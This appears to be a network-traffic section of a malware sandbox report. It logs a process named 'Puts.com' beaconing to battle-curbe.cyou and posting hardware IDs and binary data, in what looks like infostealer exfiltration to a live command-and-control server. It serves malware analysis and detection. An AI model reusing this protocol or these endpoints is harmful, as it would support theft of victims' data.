2	192.168.2.11	49973	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:58:56 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 47 Host: battle-curbe.cyou
2024-11-18 08:58:56 UTC	47	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--aaaa1&j=
2024-11-18 08:58:56 UTC	1019	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=29rapigmjc9cak91narqos7cst; expires=Fri, 14-Mar-2025 02:45:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cW3rmu0qP0by8%2Fgd5sElxczWgBKQcu1QP%2Bz%2FBRoL5Xsu%2FlY900UPKQurZebJSryrNy1tl%2F4XudXDxXx4N8DW8eYCkV3th3NCrem15MhwwU2EROV7VNGrBpfZajve8Qwp1M1Pw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c2f5eebd6c43-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1170&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=948&delivery_rate=2567375&cwnd=251&unsent_bytes=0&cid=51896c3449d10ab6&ts=498&x=0"
2024-11-18 08:58:56 UTC	350	IN	Data Raw: 31 64 39 37 0d 0a 48 39 53 41 54 62 71 79 6c 62 75 76 79 70 43 63 65 4e 45 59 78 6f 64 52 67 75 7a 52 31 78 4f 2b 38 31 4d 49 4d 32 61 4f 77 47 78 6b 39 76 5a 76 67 49 61 35 6d 64 79 76 73 71 59 4d 6f 32 32 6a 71 33 50 6a 69 50 50 74 64 64 2b 66 49 47 30 66 52 50 69 74 54 69 57 79 34 53 48 4a 31 37 6d 5a 79 72 4b 79 70 69 4f 71 4f 71 50 70 63 37 6a 4f 74 4c 31 78 33 35 38 78 61 56 67 4a 2f 71 77 50 64 37 6a 6e 4a 64 2f 52 38 64 72 44 70 2f 58 35 48 62 42 79 71 4f 34 38 36 6f 48 7a 2b 7a 48 62 69 58 45 79 45 53 76 72 74 41 31 53 74 66 4d 6d 6d 4d 2b 35 77 49 32 76 2f 72 35 43 38 33 6d 6a 35 54 33 6b 69 4c 71 2f 65 39 61 58 4d 47 78 5a 46 75 65 6d 42 48 65 32 35 43 54 56 32 4f 58 58 79 61 44 2b 2f 78 65 77 4f 75 71 6c 4e 50 6a 4f 36 2f 55 69 37 70 49 67 65 Data Ascii: 1d97H9SATbqylbuvypCceNEYxodRguzR1xO+81MIM2aOwGxk9vZvgIa5mdyvsqYMo22jq3PjiPPtdd+fIG0fRPitTiWy4SHJ17mZyrKypiOqOqPpc7jOtL1x358xaVgJ/qwPd7jnJd/R8drDp/X5HbByqO486oHz+zHbiXEyESvrtA1StfMmmM+5wI2v/r5C83mj5T3kiLq/e9aXMGxZFuemBHe25CTV2OXXyaD+/xewOuqlNPjO6/Ui7pIge
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 35 43 48 5a 33 66 66 4c 78 61 50 35 2b 77 69 34 63 36 6e 6f 4d 2b 32 45 76 4c 5a 78 32 35 73 37 5a 56 73 41 34 61 38 49 66 62 61 69 59 5a 6a 58 37 35 6d 56 36 4e 48 37 43 72 52 32 73 71 63 4a 6f 4a 48 39 72 44 48 62 6e 58 45 79 45 51 7a 70 6f 51 31 32 75 65 45 6e 30 38 4c 33 79 38 75 6c 39 2b 77 63 74 6e 53 75 35 69 48 71 67 4c 57 32 65 4e 65 59 4e 47 31 56 52 4b 4c 69 43 57 58 32 75 6d 2f 35 33 66 7a 56 78 37 2f 79 76 67 58 39 59 2b 54 69 50 36 44 57 38 37 46 77 32 4a 41 31 5a 46 38 41 34 4b 51 41 63 4c 6e 6b 4a 64 6a 58 2f 64 48 46 71 66 2f 31 46 62 4e 2f 71 65 45 31 37 49 2b 32 39 54 2b 63 6c 69 6b 71 43 55 54 43 70 51 31 76 39 4e 63 73 31 74 37 77 7a 34 32 33 76 4f 64 61 74 48 62 6b 76 58 50 75 69 37 79 6e 63 4d 36 55 50 33 68 64 41 65 71 76 44 58 4f Data Ascii: 5CHZ3ffLxaP5+wi4c6noM+2EvLZx25s7ZVsA4a8IfbaiYZjX75mV6NH7CrR2sqcJoJH9rDHbnXEyEQzpoQ12ueEn08L3y8ul9+wctnSu5iHqgLW2eNeYNG1VRKLiCWX2um/53fzVx7/yvgX9Y+TiP6DW87Fw2JA1ZF8A4KQAcLnkJdjX/dHFqf/1FbN/qeE17I+29T+clikqCUTCpQ1v9Ncs1t7wz423vOdatHbkvXPui7yncM6UP3hdAeqvDXO
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 74 37 77 7a 34 32 33 76 4f 64 61 74 48 62 6b 76 58 50 73 68 37 4f 2b 65 39 69 52 4e 6d 64 55 42 2b 75 68 41 33 71 38 37 43 6a 63 33 50 37 55 79 36 6a 31 2b 68 2b 68 66 36 33 70 50 36 44 41 38 37 4a 70 6e 4d 6c 78 52 56 59 53 37 34 30 4e 62 4c 2b 69 4d 4a 62 4a 74 39 37 42 36 4b 71 2b 48 62 5a 79 72 2b 4d 37 34 4a 79 32 75 33 72 64 6d 7a 64 72 58 41 6a 71 6f 67 39 39 73 4f 34 76 33 39 66 6c 79 38 69 75 34 50 52 61 2f 54 71 6a 2f 58 4f 34 7a 6f 57 6c 5a 73 32 48 63 31 39 53 43 75 4b 6c 47 44 32 70 72 44 61 59 31 2f 75 5a 6c 65 6a 35 2f 68 61 30 63 71 4c 68 4f 2b 2b 42 75 71 64 77 30 4a 38 6a 62 56 45 4e 34 71 30 43 64 4c 76 6c 49 74 50 61 2b 74 33 4b 71 62 4b 77 57 72 52 69 35 4c 31 7a 31 70 36 2b 75 56 2f 58 6e 54 67 71 54 6b 72 31 34 67 6c 78 39 72 70 76 Data Ascii: t7wz423vOdatHbkvXPsh7O+e9iRNmdUB+uhA3q87Cjc3P7Uy6j1+h+hf63pP6DA87JpnMlxRVYS740NbL+iMJbJt97B6Kq+HbZyr+M74Jy2u3rdmzdrXAjqog99sO4v39fly8iu4PRa/Tqj/XO4zoWlZs2Hc19SCuKlGD2prDaY1/uZlej5/ha0cqLhO++Buqdw0J8jbVEN4q0CdLvlItPa+t3KqbKwWrRi5L1z1p6+uV/XnTgqTkr14glx9rpv
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 62 4d 72 50 66 37 48 72 52 2b 6f 75 70 7a 72 73 36 30 72 54 47 45 30 52 35 4e 5a 45 62 4e 6d 45 35 69 2b 50 74 76 33 39 79 33 67 59 32 6b 38 66 49 53 76 48 79 74 36 54 6e 70 68 62 2b 2b 64 64 43 59 4e 47 78 51 41 65 6d 6a 43 6e 47 38 35 43 7a 62 33 2f 6a 57 78 65 69 38 76 68 32 72 4f 76 79 6c 46 76 65 46 76 62 4d 78 77 39 38 6f 4b 6c 59 49 72 50 70 4f 63 62 2f 6b 4b 64 33 63 39 74 2f 46 72 66 72 36 47 37 56 38 70 2b 6f 33 35 59 2b 38 73 58 33 53 6d 7a 42 72 58 51 2f 6a 71 51 73 39 2b 4b 49 6f 77 4a 43 76 6d 66 79 72 35 4f 6b 4b 76 7a 71 37 71 79 71 67 69 62 2f 31 4b 5a 79 51 49 32 42 62 43 75 6d 74 43 33 36 35 35 53 4c 65 33 50 33 51 78 61 37 39 39 77 69 77 64 71 72 69 50 65 79 41 76 72 39 79 30 64 46 2f 4b 6c 59 63 72 50 70 4f 55 62 48 76 41 64 50 63 38 Data Ascii: bMrPf7HrR+oupzrs60rTGE0R5NZEbNmE5i+Ptv39y3gY2k8fISvHyt6Tnphb++ddCYNGxQAemjCnG85Czb3/jWxei8vh2rOvylFveFvbMxw98oKlYIrPpOcb/kKd3c9t/Frfr6G7V8p+o35Y+8sX3SmzBrXQ/jqQs9+KIowJCvmfyr5OkKvzq7qyqgib/1KZyQI2BbCumtC3655SLe3P3Qxa799wiwdqriPeyAvr9y0dF/KlYcrPpOUbHvAdPc8
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 67 76 6c 54 7a 66 62 79 6c 61 36 43 34 74 4b 56 68 33 39 4d 41 66 46 49 53 35 36 38 43 50 61 6d 73 4e 70 6a 58 2b 35 6d 56 36 50 54 78 45 37 42 31 70 65 77 2f 37 59 75 36 73 48 44 61 6c 54 74 67 55 51 4c 71 6f 77 74 33 74 65 4d 6c 30 64 66 2f 33 73 36 36 73 72 42 61 74 47 4c 6b 76 58 50 4a 69 61 47 37 59 5a 79 4f 66 33 4d 52 41 2b 44 69 56 6a 32 79 36 43 44 63 31 2f 76 66 79 4b 37 2f 2f 78 57 79 65 71 76 68 4f 4f 6d 49 73 72 68 30 30 5a 55 6a 59 46 6f 4c 34 4b 73 43 63 50 61 73 62 39 2f 49 74 34 47 4e 6d 66 2f 77 46 4c 52 73 35 50 70 39 2b 63 36 30 75 54 47 45 30 54 42 6d 58 67 66 6a 6f 51 31 38 76 50 41 39 31 4e 6e 2f 33 4d 47 6a 2f 50 67 49 74 58 57 74 35 6a 44 70 69 62 75 35 65 39 2b 57 63 53 51 52 41 2f 54 69 56 6a 32 56 39 54 2f 56 6b 4f 69 58 31 4f Data Ascii: gvlTzfbyla6C4tKVh39MAfFIS568CPamsNpjX+5mV6PTxE7B1pew/7Yu6sHDalTtgUQLqowt3teMl0df/3s66srBatGLkvXPJiaG7YZyOf3MRA+DiVj2y6CDc1/vfyK7//xWyeqvhOOmIsrh00ZUjYFoL4KsCcPasb9/It4GNmf/wFLRs5Pp9+c60uTGE0TBmXgfjoQ18vPA91Nn/3MGj/PgItXWt5jDpibu5e9+WcSQRA/TiVj2V9T/VkOiX1O
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 74 48 79 71 39 7a 62 6d 67 62 79 38 65 4e 69 5a 4d 6d 70 56 41 4f 75 6e 44 58 47 39 35 53 7a 58 31 50 37 58 78 4b 65 79 73 46 71 30 59 75 53 39 63 38 47 56 73 4c 6c 38 6e 49 35 2f 63 78 45 44 34 4f 4a 57 50 62 72 73 4b 74 6a 61 38 64 33 49 72 76 6a 37 47 72 68 35 71 2b 45 31 35 49 47 7a 76 6e 6a 64 6c 7a 52 67 57 67 4c 68 6f 51 68 37 39 71 78 76 33 38 69 33 67 59 32 49 36 66 4d 57 74 44 71 37 71 79 71 67 69 62 2f 31 4b 5a 79 61 50 57 35 57 42 4f 47 68 42 6e 69 79 36 43 72 59 32 4f 58 52 7a 61 2f 67 37 42 71 36 66 36 6a 6d 4d 2b 53 49 75 72 4e 79 32 4e 46 2f 4b 6c 59 63 72 50 70 4f 55 4c 72 6c 42 74 2f 4c 74 38 61 44 73 62 4c 35 46 76 4d 69 35 4f 51 34 36 6f 47 2b 74 6e 66 66 6d 6a 52 67 55 41 50 6b 72 78 78 2b 75 65 30 72 32 4e 2f 78 33 38 79 6e 39 50 6b Data Ascii: tHyq9zbmgby8eNiZMmpVAOunDXG95SzX1P7XxKeysFq0YuS9c8GVsLl8nI5/cxED4OJWPbrsKtja8d3Irvj7Grh5q+E15IGzvnjdlzRgWgLhoQh79qxv38i3gY2I6fMWtDq7qyqgib/1KZyaPW5WBOGhBniy6CrY2OXRza/g7Bq6f6jmM+SIurNy2NF/KlYcrPpOULrlBt/Lt8aDsbL5FvMi5OQ46oG+tnffmjRgUAPkrxx+ue0r2N/x38yn9Pk
2024-11-18 08:58:56 UTC	388	IN	Data Raw: 75 5a 30 33 72 43 55 6f 33 76 62 67 54 5a 39 58 6b 53 69 34 67 45 39 37 74 74 76 30 64 66 73 79 4e 75 6c 34 76 6c 61 6a 44 54 6b 2f 58 4f 34 7a 6f 61 32 66 39 4b 57 4a 33 73 63 49 2f 71 6f 43 57 32 78 39 53 43 59 6e 72 66 66 6a 66 43 68 73 46 71 33 61 2b 53 39 59 37 4c 56 35 75 59 6d 6a 4d 4d 75 4a 45 68 45 2b 75 4a 57 4c 2f 69 69 50 5a 69 49 74 35 37 4f 75 75 44 34 47 61 56 35 34 39 73 4e 78 35 53 2b 73 32 62 4e 72 77 39 74 53 77 6e 71 74 52 38 78 6f 2b 45 68 31 74 66 68 6d 59 50 6f 2f 62 35 43 69 6a 72 73 70 51 79 75 7a 71 76 31 4b 5a 79 6b 4d 6d 52 66 41 2f 71 7a 51 31 71 73 37 79 6e 50 77 62 65 58 6a 61 36 79 70 6b 72 39 4f 71 44 30 63 37 6a 65 34 65 34 6b 6a 38 5a 68 4f 45 35 4b 39 65 49 59 50 65 36 77 59 5a 6a 43 74 34 47 4e 37 2f 48 73 43 4c 56 35 Data Ascii: uZ03rCUo3vbgTZ9XkSi4gE97ttv0dfsyNul4vlajDTk/XO4zoa2f9KWJ3scI/qoCW2x9SCYnrffjfChsFq3a+S9Y7LV5uYmjMMuJEhE+uJWL/iiPZiIt57OuuD4GaV549sNx5S+s2bNrw9tSwnqtR8xo+Eh1tfhmYPo/b5CijrspQyuzqv1KZykMmRfA/qzQ1qs7ynPwbeXja6ypkr9OqD0c7je4e4kj8ZhOE5K9eIYPe6wYZjCt4GN7/HsCLV5
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 32 36 64 35 0d 0a 77 39 6f 4f 38 76 6e 44 69 72 78 39 6e 55 41 66 69 34 44 39 72 75 2f 49 73 33 64 66 4a 35 38 4f 76 35 76 6b 55 74 58 72 6b 71 33 50 76 7a 75 75 4d 4d 5a 54 52 44 69 51 52 48 4b 7a 36 54 6b 69 31 37 43 48 66 78 75 61 55 37 72 37 2f 38 52 47 79 4f 75 71 6c 4e 61 44 57 34 2f 73 78 32 49 42 78 4d 67 46 57 74 2f 64 64 4b 75 61 77 4d 4a 62 4a 74 38 2b 4e 38 4b 43 77 57 71 45 36 2f 4b 56 30 37 6f 4f 79 74 6e 2f 66 67 79 4e 73 55 68 4c 76 35 54 42 44 6c 2b 38 6b 31 4e 33 34 30 76 4f 57 30 2f 4d 52 76 33 65 72 37 67 33 65 6d 37 43 37 66 39 75 48 49 43 6f 66 52 4f 50 69 56 6b 54 32 71 6d 2f 6e 6e 72 66 42 6a 66 43 79 79 78 6d 39 64 4b 50 7a 49 71 32 76 76 72 35 39 30 5a 34 36 4b 68 39 45 36 75 4a 57 4c 66 69 69 4b 38 6d 51 72 34 6d 66 38 36 65 74 Data Ascii: 26d5w9oO8vnDirx9nUAfi4D9ru/Is3dfJ58Ov5vkUtXrkq3PvzuuMMZTRDiQRHKz6Tki17CHfxuaU7r7/8RGyOuqlNaDW4/sx2IBxMgFWt/ddKuawMJbJt8+N8KCwWqE6/KV07oOytn/fgyNsUhLv5TBDl+8k1N340vOW0/MRv3er7g3em7C7f9uHICofROPiVkT2qm/nnrfBjfCyyxm9dKPzIq2vvr590Z46Kh9E6uJWLfiiK8mQr4mf86et
2024-11-18 08:58:56 UTC	1369	IN	Data Raw: 4c 69 4b 65 65 49 6c 5a 55 78 6b 74 45 2b 4b 67 6b 39 72 4f 70 4f 51 76 69 69 4e 35 69 49 74 2b 7a 4f 70 76 7a 35 44 4b 49 33 67 66 49 77 38 49 69 77 39 54 2b 63 6c 33 45 79 41 55 71 73 70 68 38 39 37 72 4a 39 67 34 57 6b 6a 70 33 36 37 62 41 44 38 32 7a 6b 76 57 47 75 7a 71 48 31 4b 5a 7a 57 4d 6e 68 44 41 75 2b 30 44 54 71 49 33 41 6e 62 77 66 33 34 77 4c 6a 31 77 43 53 6d 65 61 72 72 4e 50 61 66 38 2f 73 78 30 39 46 70 55 78 46 4d 6f 4b 51 4e 61 2f 62 64 59 5a 6a 49 74 34 47 4e 6e 66 48 77 46 4c 52 73 74 61 67 56 34 35 2b 35 6c 48 7a 4d 6c 6e 45 6b 45 51 4b 73 2b 6c 30 7a 39 75 59 2b 6d 49 69 6e 69 35 62 39 6f 61 6c 4b 34 57 58 71 2f 48 50 32 7a 75 76 6e 50 35 79 44 63 54 49 52 51 2b 2b 77 48 48 75 31 39 43 79 66 37 73 6e 73 7a 71 62 38 2b 51 79 47 65 Data Ascii: LiKeeIlZUxktE+Kgk9rOpOQviiN5iIt+zOpvz5DKI3gfIw8Iiw9T+cl3EyAUqsph897rJ9g4Wkjp367bAD82zkvWGuzqH1KZzWMnhDAu+0DTqI3Anbwf34wLj1wCSmearrNPaf8/sx09FpUxFMoKQNa/bdYZjIt4GNnfHwFLRstagV45+5lHzMlnEkEQKs+l0z9uY+mIini5b9oalK4WXq/HP2zuvnP5yDcTIRQ++wHHu19Cyf7snszqb8+QyGe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49974	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:58:57 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5806PKAGM4J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12805 Host: battle-curbe.cyou
2024-11-18 08:58:57 UTC	12805	OUT	Data Raw: 2d 2d 35 38 30 36 50 4b 41 47 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 0d 0a 2d 2d 35 38 30 36 50 4b 41 47 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 38 30 36 50 4b 41 47 4d 34 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 0d 0a 2d 2d 35 38 30 36 50 4b 41 47 4d 34 4a 0d 0a 43 6f 6e 74 Data Ascii: --5806PKAGM4JContent-Disposition: form-data; name="hwid"70BE76824C617F8DF7005D7B20127A88--5806PKAGM4JContent-Disposition: form-data; name="pid"2--5806PKAGM4JContent-Disposition: form-data; name="lid"yJEcaG--aaaa1--5806PKAGM4JCont
2024-11-18 08:58:59 UTC	1027	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gcos1unm4sd07igr8200kee8rf; expires=Fri, 14-Mar-2025 02:45:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jJcBrK6rGQg6RzSMFhioevK4scwt%2F5pCHDcK79NXN6XgvTqPALQwrK9Zxskb6d%2BvOvdjNPMaXe2h1HBuJ%2Fj0f8LR5bOz%2FROb5Gpry8ZtKbVqvKF%2Bw7DSplk9wb%2Br35Ss%2FbDzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c2fd9ab56b3d-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1922&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13739&delivery_rate=1488946&cwnd=248&unsent_bytes=0&cid=4584ceb89ba8bd48&ts=1947&x=0"
2024-11-18 08:58:59 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0d 0a Data Ascii: 11ok 155.94.241.187
2024-11-18 08:58:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.11	49975	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:59:00 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WWXV4CGO4DECPD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15035 Host: battle-curbe.cyou
2024-11-18 08:59:00 UTC	15035	OUT	Data Raw: 2d 2d 57 57 58 56 34 43 47 4f 34 44 45 43 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 0d 0a 2d 2d 57 57 58 56 34 43 47 4f 34 44 45 43 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 57 58 56 34 43 47 4f 34 44 45 43 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 0d 0a 2d 2d 57 57 58 56 34 43 47 4f Data Ascii: --WWXV4CGO4DECPDContent-Disposition: form-data; name="hwid"70BE76824C617F8DF7005D7B20127A88--WWXV4CGO4DECPDContent-Disposition: form-data; name="pid"2--WWXV4CGO4DECPDContent-Disposition: form-data; name="lid"yJEcaG--aaaa1--WWXV4CGO
2024-11-18 08:59:01 UTC	1017	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k0q954m0vftjink12fihq5ck9f; expires=Fri, 14-Mar-2025 02:45:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdDkjLtA1VreBKIYPIMNqtcqVqEdFHUV3gEJjVwmf4uzY2Pu5deQGqSa9FMfCTQC3ao%2BMAMJNOWUeoBWEXKlOivAZ38xQDr1N1a10y%2F5PwlGZYcD5AvO77POtlKhpHBtHPrS7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c30dc9b92e79-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15972&delivery_rate=1816813&cwnd=250&unsent_bytes=0&cid=54de1c8dddbe6551&ts=972&x=0"
2024-11-18 08:59:01 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0d 0a Data Ascii: 11ok 155.94.241.187
2024-11-18 08:59:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49976	172.67.128.233	443	1080	C:\Users\user\AppData\Local\Temp\701961\Puts.com

Timestamp	Bytes transferred	Direction	Data
2024-11-18 08:59:01 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=S1Q841TZIDHGNQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20404 Host: battle-curbe.cyou
2024-11-18 08:59:01 UTC	15331	OUT	Data Raw: 2d 2d 53 31 51 38 34 31 54 5a 49 44 48 47 4e 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 30 42 45 37 36 38 32 34 43 36 31 37 46 38 44 46 37 30 30 35 44 37 42 32 30 31 32 37 41 38 38 0d 0a 2d 2d 53 31 51 38 34 31 54 5a 49 44 48 47 4e 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 31 51 38 34 31 54 5a 49 44 48 47 4e 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 4a 45 63 61 47 2d 2d 61 61 61 61 31 0d 0a 2d 2d 53 31 51 38 34 31 54 5a Data Ascii: --S1Q841TZIDHGNQContent-Disposition: form-data; name="hwid"70BE76824C617F8DF7005D7B20127A88--S1Q841TZIDHGNQContent-Disposition: form-data; name="pid"3--S1Q841TZIDHGNQContent-Disposition: form-data; name="lid"yJEcaG--aaaa1--S1Q841TZ
2024-11-18 08:59:01 UTC	5073	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 fd 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d ae 2f 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 f5 47 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 be 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 d7 1f 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 fa a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQM/64G6(X&~`aO
2024-11-18 08:59:02 UTC	1022	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 08:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=opng414p2hjir8ejdj1jl589ad; expires=Fri, 14-Mar-2025 02:45:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9TgdZvTAEBgpBSbVmG6dyOZYE4X6fc%2FwgVMN7CNt2iFHEz1S0OwQnP4vuRjXbZCipi7h%2BcAAdyLRCgXLO5gn9gQ45cXnGMtfhQ1Uzsh9sx5pMzeTdnmPN%2FTvAsKYDjM%2FNN0zw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e46c3188b0c465c-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1723&sent=10&recv=26&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21363&delivery_rate=1670126&cwnd=251&unsent_bytes=0&cid=61b3437bf9a5f2c5&ts=1025&x=0"
2024-11-18 08:59:02 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0d 0a Data Ascii: 11ok 155.94.241.187
